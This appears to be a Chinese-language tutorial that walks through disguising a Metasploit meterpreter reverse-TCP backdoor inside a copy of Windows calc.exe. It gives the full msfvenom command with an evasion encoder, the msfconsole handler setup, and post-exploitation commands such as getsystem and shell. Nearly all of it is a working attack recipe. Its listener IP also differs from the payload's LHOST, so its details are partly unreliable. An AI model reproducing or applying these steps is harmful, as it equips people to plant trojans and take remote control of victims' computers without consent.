一、准備工作:
1、安裝kali linux
2、從win7上拷貝一個可執行的.exe文件至kali linux(文中使用的是windows自帶的calc.exe文件)
二、開始在kali linux上創建.exe文件
命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.128 LPORT=4444 -e x86/shikata_ga_nai -b 'x00' -x ./calc.exe -f exe -o /opt/z/backdoor.exe (沒有報錯就表示成功,可以切換到保存的路徑下查看)
ps:(LHOST=192.168.88.128 #本機ip地址
LPORT=4444 #要監控的端口
./calc.exe #從windows復制過來的.exe文件
/opt/z/backdoor.exe #生成的文件要存放的路徑和名稱)
ps:msfvenom的基本參數
Options:
-p, --payload <payload> 指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload,請使用'-'或者stdin指定
-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: payloads, encoders, nops, all
-n, --nopsled <length> 為payload預先指定一個NOP滑動長度
-f, --format <format> 指定輸出格式 (使用 --help-formats 來獲取msf支持的輸出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(編碼器)
-a, --arch <architecture> 指定payload的目標架構
--platform <platform> 指定payload的目標平台
-s, --space <length> 設定有效攻擊荷載的最大長度
-b, --bad-chars <list> 設定規避字符集,比如: '\x00\xff'
-i, --iterations <count> 指定payload的編碼次數
-c, --add-code <path> 指定一個附加的win32 shellcode文件
-x, --template <path> 指定一個自定義的可執行文件作為模板
-k, --keep 保護模板程序的動作,注入的payload作為一個新的進程運行
--payload-options 列舉payload的標准選項
-o, --out <path> 保存payload
-v, --var-name <name> 指定一個自定義的變量,以確定輸出格式
--shellest 最小化生成payload
-h, --help 查看幫助選項
--help-formats 查看msf支持的輸出格式列表
三、在kali linux上啟動監控
1、msfconsole #進入msf命令
2、use exploit/multi/handler #加載模塊
3、set lhost 192.168.88.1 #要監控的ip
4、set lport 4444 #要監控的端口,與上文端口要一致
5、exploit -z -j #開始監聽,等待程序響應
四、在windows上運行backdoor.exe文件
五、查看並連接
1、sessions #查看會話
有紅色框中的信息,表示存在會話
2、msf exploit(handler) > sessions -i 1 #連接會話
出現"meterpreter >"表示連接成功,
3、連接成功以后可以進行操作,詳見下文:
ps:
getsystem #會自動利用各種各樣的系統漏洞來進行權限提升
migrate #進程id進程遷移
background #把當前的會話設置為背景,需要的時候在啟用
getuid #查看對方正在運行的用戶
ps #列出所有的進程
getpid #返回運行meterpreter的id號
sysinfo #產看系統信息和體系結構
shell #切換到cmd的系統權限方式
exit #退出shell會話返回meterpreter或終止meterpreter